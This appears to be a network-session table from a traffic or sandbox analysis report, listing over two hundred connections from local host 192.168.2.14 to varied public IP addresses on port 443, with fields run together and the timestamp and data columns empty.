                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12315192.168.2.145331659.151.83.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12316192.168.2.1443044185.57.11.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12317192.168.2.14438541.177.195.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12318192.168.2.143363675.63.116.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12319192.168.2.1440208104.63.23.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12320192.168.2.1450668199.29.98.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12321192.168.2.143509476.212.156.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12322192.168.2.1447032173.95.27.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12323192.168.2.14600362.140.224.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12324192.168.2.144411291.24.160.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12325192.168.2.145882494.5.128.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12326192.168.2.1440282197.181.55.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12327192.168.2.144212834.245.109.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12328192.168.2.143358293.142.136.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12329192.168.2.1458540147.111.22.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12330192.168.2.1458676107.150.146.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12331192.168.2.1439864176.119.109.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12332192.168.2.1441738134.216.116.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12333192.168.2.1450898110.219.137.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12334192.168.2.145957234.26.49.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12335192.168.2.146027823.113.139.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12336192.168.2.1437222207.255.71.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12337192.168.2.144633440.243.241.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12338192.168.2.1460016212.154.245.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12339192.168.2.1453760112.150.208.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12340192.168.2.14550485.219.195.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12341192.168.2.1434650136.37.183.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12342192.168.2.145082882.146.151.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12343192.168.2.14349622.173.90.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12344192.168.2.1440596137.63.16.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12345192.168.2.144358862.196.217.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12346192.168.2.1451632128.175.47.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12347192.168.2.1458400139.31.223.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12348192.168.2.1447788143.225.8.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12349192.168.2.145826694.90.113.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12350192.168.2.146006262.61.122.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12351192.168.2.144841277.31.155.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12352192.168.2.145115475.68.209.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12353192.168.2.143598078.19.205.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12354192.168.2.144820612.63.31.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12355192.168.2.144294040.137.96.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12356192.168.2.1445448128.226.145.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12357192.168.2.145641492.245.77.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12358192.168.2.1457238220.133.209.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12359192.168.2.1445382137.174.128.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12360192.168.2.143845868.210.103.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12361192.168.2.1452930187.41.147.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12362192.168.2.145769484.152.205.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12363192.168.2.143711676.232.189.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12364192.168.2.145567098.47.153.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12365192.168.2.1459456211.9.148.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12366192.168.2.1449616204.52.141.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12367192.168.2.144227682.58.11.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12368192.168.2.143411237.9.24.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12369192.168.2.144990846.146.177.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12370192.168.2.1435864146.143.67.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12371192.168.2.144153872.60.180.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12372192.168.2.145262059.52.19.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12373192.168.2.1446896144.67.174.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12374192.168.2.1445030117.239.163.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12375192.168.2.1441318171.167.3.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12376192.168.2.1443364218.89.23.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12377192.168.2.1444866146.91.129.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12378192.168.2.1457018206.4.18.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12379192.168.2.1447446156.133.56.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12380192.168.2.144011651.155.220.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12381192.168.2.145524212.217.101.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12382192.168.2.144583827.143.48.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12383192.168.2.1438320101.32.71.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12384192.168.2.1444296206.223.88.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12385192.168.2.144476025.136.255.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12386192.168.2.145923843.156.231.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12387192.168.2.1444756119.174.110.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12388192.168.2.1456820137.192.158.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12389192.168.2.1439692216.42.199.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12390192.168.2.143744013.83.116.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12391192.168.2.144051820.33.153.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12392192.168.2.1435012181.31.140.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12393192.168.2.1452778195.182.217.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12394192.168.2.1459488111.100.251.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12395192.168.2.14479921.49.226.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12396192.168.2.1451192184.242.45.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12397192.168.2.143413646.149.112.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12398192.168.2.1438710180.208.255.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12399192.168.2.1446832164.163.175.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12400192.168.2.143970078.17.110.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12401192.168.2.14479805.220.52.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12402192.168.2.1451742103.232.176.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12403192.168.2.144854634.188.208.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12404192.168.2.1436560137.70.184.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12405192.168.2.145880294.44.37.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12406192.168.2.145256658.0.211.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12407192.168.2.145266891.190.23.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12408192.168.2.1435016190.158.77.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12409192.168.2.145537877.146.216.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12410192.168.2.1434922210.39.147.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12411192.168.2.1443242216.240.154.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12412192.168.2.145766292.57.201.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12413192.168.2.1448414137.51.24.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12414192.168.2.1433700216.126.234.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12415192.168.2.145932257.112.148.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12416192.168.2.145099261.3.138.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12417192.168.2.1456368117.15.9.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12418192.168.2.144186013.17.154.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12419192.168.2.1453462163.217.81.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12420192.168.2.1453534150.8.110.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12421192.168.2.1458530173.89.68.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12422192.168.2.145682860.94.176.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12423192.168.2.1446530119.220.22.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12424192.168.2.1441662181.110.243.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12425192.168.2.143805291.99.186.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12426192.168.2.1440808129.199.216.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12427192.168.2.1440374194.201.179.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12428192.168.2.144420613.21.98.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12429192.168.2.1452838154.102.213.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12430192.168.2.1439398161.129.149.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12431192.168.2.145420839.110.29.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12432192.168.2.14443588.135.35.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12433192.168.2.143635670.19.39.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12434192.168.2.1447606163.50.152.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12435192.168.2.1449744113.240.17.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12436192.168.2.1457356150.181.126.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12437192.168.2.1435632126.173.147.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12438192.168.2.1457084217.204.227.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12439192.168.2.145906420.251.139.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12440192.168.2.1451744175.124.142.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12441192.168.2.1433562126.112.164.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12442192.168.2.1438426154.87.60.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12443192.168.2.143523097.35.182.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12444192.168.2.146089690.228.249.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12445192.168.2.1455258192.41.121.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12446192.168.2.1457492202.230.19.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12447192.168.2.1447294206.155.25.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12448192.168.2.143764037.165.126.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12449192.168.2.144760427.19.251.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12450192.168.2.143462025.62.67.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12451192.168.2.1440156168.69.186.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12452192.168.2.1440044122.166.210.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12453192.168.2.145116285.100.185.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12454192.168.2.1437192196.183.114.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12455192.168.2.1459066119.195.74.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12456192.168.2.1435982108.91.38.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12457192.168.2.143331686.191.245.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12458192.168.2.1432868144.242.64.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12459192.168.2.1448846176.189.112.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12460192.168.2.14606181.234.26.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12461192.168.2.1444090114.198.59.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12462192.168.2.1439480180.30.101.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12463192.168.2.1456326157.21.35.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12464192.168.2.1455824138.63.157.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12465192.168.2.143720223.158.193.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12466192.168.2.1454354195.220.9.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12467192.168.2.1456592192.104.54.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12468192.168.2.1433688172.103.204.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12469192.168.2.144658257.52.40.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12470192.168.2.143703046.96.146.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12471192.168.2.144129034.178.172.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12472192.168.2.1444396143.254.56.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12473192.168.2.144124446.107.250.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12474192.168.2.1443946203.167.86.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12475192.168.2.1450458108.100.101.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12476192.168.2.146054046.14.196.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12477192.168.2.145602286.183.148.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12478192.168.2.1433836216.203.34.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12479192.168.2.145133237.77.48.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12480192.168.2.1434222106.121.3.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12481192.168.2.144912270.244.228.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12482192.168.2.1447370150.107.165.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12483192.168.2.146042814.8.127.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12484192.168.2.144749258.142.165.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12485192.168.2.145395053.111.216.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12486192.168.2.1442828183.121.175.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12487192.168.2.1439942201.231.165.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12488192.168.2.143843872.159.133.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12489192.168.2.143986695.149.43.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12490192.168.2.1442928142.223.69.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12491192.168.2.1437142222.41.124.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12492192.168.2.1457742168.251.11.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12493192.168.2.1454840208.234.208.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12494192.168.2.1452894115.132.183.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12495192.168.2.1459814119.85.29.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12496192.168.2.143816289.235.51.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12497192.168.2.14521208.99.166.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12498192.168.2.145019492.201.199.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12499192.168.2.144679812.4.1.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12500192.168.2.1452886147.210.6.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12501192.168.2.1448890196.255.207.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12502192.168.2.1460258129.236.107.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12503192.168.2.1458492203.60.140.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12504192.168.2.1435708199.255.159.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12505192.168.2.144285869.40.192.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12506192.168.2.1445174115.178.166.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12507192.168.2.1452326151.41.98.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12508192.168.2.1447232121.14.104.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12509192.168.2.1460472110.30.145.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12510192.168.2.14483462.98.83.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12511192.168.2.1454496197.162.89.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12512192.168.2.144187262.10.16.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12513192.168.2.145277485.147.2.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12514192.168.2.1446776212.3.22.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12515192.168.2.1460320191.168.7.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12516192.168.2.1437530107.252.249.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12517192.168.2.14508721.135.91.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12518192.168.2.1446436205.144.234.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12519192.168.2.1434922149.93.57.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12520192.168.2.145894084.72.70.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12521192.168.2.143751848.45.248.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12522192.168.2.145881283.183.194.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12523192.168.2.145476227.206.167.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12524192.168.2.1449476162.222.63.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12525192.168.2.1458800186.24.19.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12526192.168.2.1439010172.109.253.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12527192.168.2.1447894202.34.33.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12528192.168.2.1433838197.157.188.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12529192.168.2.143344214.64.35.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12530192.168.2.145613481.106.178.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12531192.168.2.1450448111.6.199.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12532192.168.2.1437916140.193.235.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12533192.168.2.1434230218.119.245.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12534192.168.2.1444608103.141.159.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12535192.168.2.145030868.226.230.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12536192.168.2.1450340125.200.33.240443
